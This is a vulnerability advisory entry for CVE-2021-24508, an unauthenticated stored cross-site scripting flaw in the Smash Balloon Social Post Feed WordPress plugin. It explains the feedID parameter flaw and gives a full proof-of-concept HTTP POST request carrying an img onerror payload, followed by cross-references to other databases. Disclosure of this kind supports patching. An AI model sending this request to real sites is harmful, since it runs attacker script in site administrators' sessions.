Lucene search
Dc11WPEX-ID:2B543740-D4B0-49B5-A021-454A3A72162FHistoryAug 16, 2021 - 12:00 a.m.
Smash Balloon Social Post Feed < 2.19.2 - Unauthenticated Stored XSS
2021-08-1600:00:00
dc11
443
xss
unauthenticated
stored
payload size
max length
parameters
security exploit
wordpress
EPSS
0.002
Percentile
54.9%
The plugin does not sanitise or escape the feedID POST parameter in its feed_locator AJAX action (available to both authenticated and unauthenticated users) before outputting a truncated version of it in the admin dashboard, leading to an unauthenticated Stored Cross-Site Scripting issue which will be executed in the context of a logged in administrator.
For the attack to be successful, the following requirements need to be meet
- Max payload size: 31 characters
- feedID parameter length must be greater than 31 characters to trigger the echo of unescaped data
- The shortCodeAtts parameter value must be uniq
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 192
Connection: close
action=feed_locator&feedLocatorData[0][feedID]=<img%20src%20onerror=alert(/XSS/)>
&feedLocatorData[0][shortCodeAtts]=uniq1234&feedLocatorData[0][postID]=1&feedLocatorData[0][location]=footer
XSS will be triggered at https://example.com/wp-admin/admin.php?page=cff-top&tab=allfeedsRelated
patchstack
patchstack
cvelist
cvelist
cve
cve
CVE-2021-24508
2021-09-13 18:15:15
wpvulndb
wpvulndb
Smash Balloon Social Post Feed < 2.19.2 - Unauthenticated Stored XSS
2021-08-16 00:00:00
openvas
openvas
WordPress Smash Balloon Social Post Feed Plugin < 2.19.2 XSS Vulnerability
2021-10-12 00:00:00
prion
prion
Cross site scripting
2021-09-13 18:15:00
nvd
nvd
CVE-2021-24508
2021-09-13 18:15:15